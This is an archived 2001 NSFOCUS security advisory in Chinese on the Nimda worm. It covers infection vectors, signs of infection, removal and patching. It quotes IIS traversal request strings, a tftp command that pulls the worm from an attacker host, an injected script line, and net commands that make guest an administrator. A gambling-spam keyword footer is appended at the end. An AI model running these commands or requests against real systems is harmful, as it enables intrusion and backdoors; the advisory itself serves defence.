首頁 -> 安全研究

安全研究

緊急通告
綠盟科技緊急通告(Alert2001-02)

NSFOCUS安全小組([email protected])
http://www.nsfocus.com

防范"Nimda"蠕蟲!

發布日期:2001-09-21


受影響的軟件及系統:
====================
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows ME
Microsoft Windows NT 4.0
Microsoft Windows 2000
Microsoft Windows XP

綜述:
======
一種新型的惡意蠕蟲"Nimda"(又稱"概念病毒(CV) v.5")正在廣泛傳播。它影響所有未安裝補丁的Windows系統,破壞力極大。

分析:
======
該蠕蟲使用多種途徑進行傳播:
  
    。通過email郵件傳播
    。通過網絡共享傳播
    。通過主動掃描并攻擊未打補丁的IIS服務器傳播
    。通過瀏覽被篡改網頁傳播

這個蠕蟲的傳播利用了如下四個安全漏洞:

    。微軟IE異常處理MIME頭漏洞
      
      IE在處理MIME頭中"Content-Type:"處指定的某些類型時,存在問題,攻擊者可以
      利用這類缺陷在IE客戶端執行任意命令.
      
      參見下列鏈接:
      http://security.nsfocus.com/showQuery.asp?bugID=1350
      http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
    
    。Microsoft IIS Unicode解碼目錄遍歷漏洞(中聯綠盟安全公告(SA2000-06))
    
      微軟IIS 4.0和IIS 5.0在Unicode字符解碼的實現中存在一個安全漏洞,導致用戶
      可以遠程通過IIS執行任意命令
      
      參見下列鏈接:
      http://www.nsfocus.com/sa-06.htm
      http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
  
    。Microsoft IIS CGI文件名錯誤解碼漏洞(中聯綠盟安全公告(SA2001-02))
      
      微軟IIS 4.0/5.0在處理CGI程序文件名時存在一個安全漏洞,由于錯誤地對文件名
      進行了兩次解碼,攻擊者可能利用這個漏洞執行任意系統命令
      
      參見下列鏈接:
      http://www.nsfocus.com/sa01-02.htm
      http://www.microsoft.com/technet/security/bulletin/ms01-026.asp

    。"CodeRedII"和Sadmind/IIS蠕蟲留下的后門程序
      
      參見下列鏈接:
      http://www.nsfocus.com/alert01-001.htm
      http://www.cert.org/advisories/CA-2001-11.html
    

蠕蟲特征:
==========

  。郵件傳播時的特征:
    - 郵件信息的主題行文本內容不定
    - 郵件正文顯示未空
    - 包含一個名為"readme.exe"的base64編碼的可執行附件
    - 附件大小為57344字節
    
  。被感染系統特征:
  
    - 在C:\、D:\、E:\系統盤下以及其他目錄下有很多Admin.dll文件
    - 存在大量的readme.eml或者readme.nws文件
    - 存在大量的riched20.dll文件
    - \Windows\System目錄下有load.exe文件
    - 在Windows臨時目錄下存在很多名為"MEP*.TMP.EXE"的文件。
    - C盤被設為共享,共享名為C$
    - guest用戶被激活并被加到管理員組
    
    注:上述文件大都被設置了隱藏、系統屬性,您需要在資源管理器中設置"查看所有
    類型"文件才可以看到。
    
  。被攻擊的IIS服務器的日志記錄中有如下字符串:
    
        GET /scripts/root.exe?/c+dir
        GET /MSADC/root.exe?/c+dir
        GET /c/winnt/system32/cmd.exe?/c+dir
        GET /d/winnt/system32/cmd.exe?/c+dir
        GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
        GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
        GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
        GET msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../
        winnt/system32/cmd.exe?/c+dir
        GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
        GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
        GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
        GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
        GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
        GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
        GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
        GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
      
       注:這并不意味著這個系統已經被感染,只是表明曾經遭受過攻擊。

    。 從受感染主機會往外部地址TCP 80端口發起大量連接。


蠕蟲危害:
==========

    - 產生大量的垃圾郵件
    - 用蠕蟲副本替換系統文件,可能影響word,frontpage等軟件的正常工作
    - 嚴重降低系統以及網絡性能
    - 創建開放共享,大大降低了系統的安全性
    - 將Guest帳號賦予管理員權限,降低了系統的安全性    

蠕蟲行為分析:
============

    
  這個蠕蟲的行為可以分為三個部分:傳播、系統感染、安裝后門
    
  【傳播】
  
   。Email傳播
    
    蠕蟲會向被攻擊者的郵件地址發送一封攜帶了蠕蟲附件的郵件。這個郵件由兩部分
    MIME類型的信息組成。第一部分的MIME類型為"text/html",但卻沒有包含文本,因
    此看起來是空的。第二部分的MIME類型為"audio/x-wav",但它實際上攜帶的是一個
    名為"readme.exe"的base64編碼的可執行附件。
    
    利用了“微軟IE異常處理MIME頭漏洞” 安全漏洞,任何運行在x86平臺下并且使用微
    軟IE 5.5 SP1或之前版本(IE 5.01 SP2除外)來顯示HTML郵件的郵件客戶端軟件,
    都將自動執行郵件附件。用戶甚至只需打開或預覽郵件即可使蠕蟲被執行。

    被蠕蟲攻擊的目標郵件的地址從下列兩個來源中獲得:
    
      。用戶web cache文件夾中的.htm和.html文件
      。用戶通過MAPI服務收到的email郵件的內容
    
    蠕蟲在這些文件中搜索看起來象郵件地址的字符串,然后向這些地址發送一份包含蠕
    蟲拷貝的郵件。Nimda蠕蟲在Windows注冊表中記錄最后一批郵件發送的時間,然后每
    10天重復搜索郵件地址并發送蠕蟲郵件的過程。
  
   。IIS Web服務器傳播
  
     蠕蟲會利用兩個IIS服務器的目錄遍歷漏洞和以前的一些IIS蠕蟲(CodeRedII和
     Sadmind/IIS)留下的后門程序來進行傳播。
    
     蠕蟲按照下列幾率來選擇攻擊目標的IP地址:

    。50%的幾率,在與本地IP地址前2字節相同的地址(B類網絡)中選擇一個
    。25%的幾率,在與本地IP地址前1字節相同的地址(A類網絡)中選擇一個
    。25%的幾率,隨機選擇IP地址
    
    蠕蟲會首先在啟動一個tftp服務器,監聽在udp/69端口。
    一旦發現受影響的主機,蠕蟲會通過執行類似下列命令來向其發送蠕蟲代碼:
    "GET /scripts/root.exe?/c+tftp -i attackerIP GET Admin.dll HTTP/1.0"
    
    attackerIP就是正在發起攻擊的蠕蟲所在的主機IP.
    
    這樣被攻擊的主機上就產生了一個蠕蟲的拷貝,命名為admin.dll.
    
    然后蠕蟲會發送類似如下請求來執行蠕蟲拷貝:
    "GET /scripts/Admin.dll HTTP/1.0"
    
    對于IIS 5.0,這也利用了另外一個IIS安全漏洞"Microsoft IIS 5.0 系統文件列表
    權限提升漏洞"。如果任何可執行文件的名字與IIS系統文件名列表中的文件匹配,則
    當它通過IIS被執行時就會在IIS 進程空間中運行,也就是以SYSTEM權限執行。
    admin.dll就是Frontapage擴展中所帶的一個動態鏈接庫,它剛好在IIS系統文件列表
    中。(參見鏈接:http://security.nsfocus.com/showQuery.asp?bugID=1748
    
    在執行完TFTP命令之后,當前目錄下會產生一些臨時文件,例如TFTP68等等,它們也
    是蠕蟲拷貝。
    
    Admin.dll被運行時,它會把自己復制到\windows文件夾命名為mmc.exe,然后帶上參
    數"-qusery9bnow"運行。
    
    蠕蟲會在整個硬盤中搜索后綴為:".HTML"、".ASP"、".HTM",文件名為:"DEFAULT"
    、"INDEX"、"MAIN"、"README"的文件。一旦發現了這樣的文件,蠕蟲會在該目錄下
    創建一個README.EML文件,它是一個由兩部分組成的MIME編碼的文件,里面也包含了
    蠕蟲拷貝。然后蠕蟲會在找到的文件的末尾增加如下JvaScript代碼:
    <script language="JavaScript">
    window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
    
    這樣,其他用戶如果使用瀏覽器瀏覽被修改的網頁或者資源管理(打開了預覽功能)
    來瀏覽共享服務器上的README.EML文件時,利用IE瀏覽器"異常處理MIME頭漏洞",蠕蟲
    就可以傳播到新的客戶端上。

  。文件共享傳播
  
    蠕蟲訪問共享網絡資源,然后開始檢測遠程系統上的文件。
    
    如果發現一個.EXE文件,它將蠕蟲代碼加到原來文件的前面。下次執行被感染文件時
    將首先執行蠕蟲代碼。它并不感染'Winzip32.exe'。
    
    如果發現.DOC文件,它將自己拷貝到DOC文件所在目錄下,改名為RICHED32.DLL,并
    設置隱藏、系統權限。由于Windows Word在打開該DOC文件時,會首先在當前目錄尋
    找RICHED32.DLL,這將首先運行蠕蟲代碼。這也會大大增大遠程用戶的感染幾率。
    
    它也會利用找到的文檔文件的名字創建以.EML和.NWS后綴的文件,這些文件也是帶有
    蠕蟲拷貝的MIME編碼的文件。
    
   【系統感染】
  
   蠕蟲會檢查注冊表中的如下表項:
   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
   然后感染所有找到的程序。
  
   蠕蟲會將自身拷貝到\Windows\System目錄中,命名為load.exe.并修改SYSTEM.INI文件,
   將Shell部分改為如下內容:
   Shell = explorer.exe load.exe -dontrunold
   這樣每次系統重啟后都會運行蠕蟲拷貝。
  
   它會用自身拷貝替換Windows目錄下的Riched20.dll.這樣下次執行word時會自動執行
   這個蠕蟲。

   如果蠕蟲是以README.EXE文件名被執行,它會將自身拷貝到windows臨時目錄中,并使
   用隨機文件名,例如'MEP*.TMP.EXE'。
  
   蠕蟲在第一次執行時會尋找"EXPLORER"進程,將自己的進程注冊為"Explorer"的一個
   遠程線程。這樣即使用戶退出系統,蠕蟲仍然可以繼續執行。

   【安裝后門】
  
   Nimda蠕蟲會修改一些注冊表項以降低系統安全性,同時也安裝了后門。
  
   蠕蟲會將所有驅動器設置成共享狀態,它會編輯如下注冊表項:
   HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\[C$ -> Z$]
  
   蠕蟲會刪除下列注冊表項的所有子鍵以禁止共享安全性:
   HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
  
   蠕蟲會修改下列注冊表項:
   HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
   調整 'Hidden', 'ShowSuperHidden'和 'HideFileExt' 鍵值,使得使用資源管理器無
   法顯示隱藏文件。這可以保護蠕蟲代碼被發現。
  
   通過執行下列命令,蠕蟲還激活了guest用戶,將其密碼設置為空,并將其加入到
   Administrators組中(對于Windows NT/2000/XP用戶):
   net user guest /add
   net user guest /active
   net user guest ""
   net localgroup Administrators guest
   net localgroup Guests guest /add

   通過執行下列命令,蠕蟲將C:\設置為完全共享:
   net share c$=c:\

解決方法:
==========
我們建議受到蠕蟲感染的用戶重新安裝系統,以便清除其他潛在的后門。如果您不能立刻
重裝系統,您可以參考下列步驟來清除蠕蟲或者防止被蠕蟲攻擊:

1.  下載IE和IIS的補丁程序到受影響主機上
2.  安裝殺毒軟件和微軟的CodeRedII清除程序
3.  備份重要數據
4.  斷開網絡連接(例如拔掉網線)
5.  執行殺毒工作,清除可能的CodeRedII蠕蟲留下的后門
6.  安裝IE和IIS的補丁
7.  重新啟動系統
8.  再次運行殺毒軟件以確保完全清除蠕蟲病毒
9.  采取一些其他的預防措施(見下面的介紹)
10. 將計算機重新與網絡連接

注:上述步驟僅供參考。

※  清除蠕蟲:

由于蠕蟲修改和替換了大量的系統文件,因此手工清除可能比較繁瑣而且不易清除干凈。
我們建議用戶使用最新版本的反病毒廠商的殺毒軟件來進行清除工作。目前各大反病毒廠
商都已經可以查殺這種蠕蟲病毒。您可能需要多次運行殺毒軟件或清除程序,以確保徹底
殺掉受感染的文件。

我們建議您在殺毒之前備份您的重要數據,以避免可能的數據丟失。

具體清除步驟如下(這時應當已經斷開網絡連接):

1. 對于Windows 95/98/ME用戶,您需要手工編輯C:\windows\system.ini(假設您的Windows
   系統安裝在C:\),找到如下行:
   Shell = explorer.exe load.exe -dontrunold
   將其改為:
   Shell = explorer.exe
   保存退出
   重新啟動計算機
  
2. 運行殺毒軟件清除病毒

4. 運行清除CodeRedII蠕蟲的工具

5. 重新禁止guest用戶,并將guest用戶從Administrators組中刪除(只有對于Windows NT
   /2000用戶需要執行此步驟)

6. 檢查您的共享。對于Windows 95/98/ME用戶,應當刪除各個硬盤的共享。
   對于Windows NT/2000用戶,確保您的管理員口令具有足夠的強度。

7. 重啟動計算機并再次運行殺毒軟件以確保完全清除蠕蟲病毒


※  為了防止再次被蠕蟲感染,您可能需要采取以下防范措施:

。對于不提供IIS服務的普通用戶:

1. 您應當首先在IE瀏覽器菜單中選擇:
   工具|Internet選項|安全|Inernet|自定義級別...|
   在“腳本”欄其中禁用"Java 小程序腳本"和"活動腳本"。在“下載”欄中禁止“文件
   下載”。以防止用戶瀏覽被蠕蟲感染的頁面時自動下載并執行蠕蟲代碼。

2. 不要執行收到郵件中的附件程序。

3. 根據您瀏覽器的版本,將您的IE升級到下列最新版本之一:
  
   Internet Explorer 5.01 Service Pack 2:
   http://www.microsoft.com/windows/ie/downloads/recommended/ie501sp2/default.asp
  
   Internet Explorer 5.5 Service Pack 2:
   http://www.microsoft.com/windows/ie/downloads/recommended/ie55sp2/default.asp
  
   Internet Explorer 6:
   http://www.microsoft.com/windows/ie/downloads/ie6/default.asp

注:如果您并不需要使用IIS服務,但是由于缺省安裝時選擇了IIS服務,那么我們建議您
立刻卸載或者禁止啟動IIS服務。

。對于需要提供IIS服務的用戶:

1. 禁止任何用戶執行tftp.exe和cmd.exe
  
   對于使用NTFS分區的用戶,您可以以管理員身份在命令行窗口中執行下列命令:
  
   c:\> cacls %systemroot%\system32\tftp.exe /e /d Everyone
   c:\> cacls %systemroot%\system32\cmd.exe /e /d Everyone
  
  如果您的系統使用的是FAT32分區而不是NTFS分區,上述命令無效,您可以通過將
  tftp.exe和cmd.exe改名來使蠕蟲不能執行這兩個程序。其他一些重要的程序可能也需要
  進行權限限制,例如net.exe, ftp.exe等等

2. 檢查是否您的系統中還有CodeRedII或者Sadmind/IIS蠕蟲留下的后門,您可以使用微
  軟提供的清除工具CodeRedCleanup來進行清除:
  
   您可以在下列地址下載此工具:
   http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31878
    
3. 使用regedit刪除下列鍵值(可選)

   HKEY_CLASSES_ROOT\.eml
   HKEY_CLASSES_ROOT\.nws

4. 刪除不必要的可執行虛擬目錄,例如/scripts,/MSADC, /_vti_bin等等。
  
5. 安裝最新的安全補丁:

   Windows NT 4系統
    
     . 安裝微軟最新的IIS安全漏洞補丁合集:
    
     http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32061
    
     注: 在下拉框中選擇相應的語言版本(例如簡體中文版或者英文版)下載。

    上述補丁可以安裝在安裝了SP5或者SP6的Windows NT系統中
    
   Windows 2000系統            
  
    . 安裝微軟最新的IIS安全漏洞補丁合集:
    
    http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32011
    
    注: 在下拉框中選擇相應的語言版本(例如簡體中文版或者英文版)下載
    
    上述補丁可以安裝在SP1或SP2的Windows 2000系統中
    
    注意:安裝補丁的時候最好斷掉網絡連接。

。對于提供了文件共享服務的用戶:

檢查您的文件共享目錄,如果您并不真的需要提供文件共享服務。刪除共享。
如果您必須要提供共享服務,確保為其設置足夠強度的口令,并盡量禁止共享目錄開放寫
權限。

附錄:各大殺毒廠商的地址:

    殺毒軟件廠商信息
    
    Aladding Knowledge Systems
    http://www.eSafe.com/home/csrt/valerts2.asp?virus_no=10087
    
    Central Command, Inc.
    http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.php?p_refno=010918-000005
    
    Command Software Systems
    http://www.commandsoftware.com/virus/nimda.html
    
    F-Secure Corp
    http://www.datafellows.com/v-descs/nimda.shtml
    
    McAfee
    http://vil.mcafee.com/dispVirus.asp?virus_k=99209
    
    Panda Software
    http://service.pandasoftware.es/library/card.jsp?Virus=Nimda
    
    Proland Software
    http://www.pspl.com/virus_info/worms/nimda.htm
    
    Sophos
    http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
    
    Symantec
    http://www.symantec.com/avcenter/venc/data/[email protected]
    
    Trend Micro
    http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
    http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
    
    金山公司:
    http://www.iduba.net/resource/special/Concept/index.htm
    
    瑞星公司:
    http://www.rising.com.cn/
    
參考資料:

[1.] CERT Incident Note CA-2001-26 :
     http://www.cert.org/advisories/CA-2001-26.html
[2.] Symantec:
     http://www.symantec.com/avcenter/venc/data/[email protected]
[3.] F-Secure Corp
     http://www.datafellows.com/v-descs/nimda.shtml

聲 明
==========

本安全公告僅用來描述可能存在的安全問題,綠盟科技不為此安全公告提供任何保證或承諾。由于傳播、利用此安全公告所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,綠盟科技以及安全公告作者不為此承擔任何責任。綠盟科技擁有對此安全公告的修改和解釋權。如欲轉載或傳播此安全公告,必須保證此安全公告的完整性,包括版權聲明等全部內容。未經綠盟科技允許,不得任意修改或者增減此安全公告內容,不得以任何方式將其用于商業目的。

關于綠盟科技
============

綠盟科技(NSFOCUS Co., Ltd.)是中國網絡安全領域的領導企業,致力于網絡和系統安全問題的研究、高端網絡安全產品的研發、銷售與網絡安全服務,在入侵檢測/保護、遠程評估、 DDoS攻擊防護等方面提供具有國際競爭能力的先進產品,是國內最具安全服務經驗的專業公司。有關綠盟科技的詳情請參見: http://www.nsfocus.com

© 2019 綠盟科技
重庆时时彩计划准不准 七星彩前四位算法论坛 时时彩单双傻瓜买法 今天四川快乐12走势图咋天 时时彩后三包胆 重庆时时彩龙虎玩法 最新湖北快三专家预测 广东11选五计划软件手机版 赵薇割韭菜为啥赚钱 重庆时时彩计划_人工版 知乎 网易音乐人 赚钱 齐天大圣捕鱼游戏机玩法 北京时时开奖结果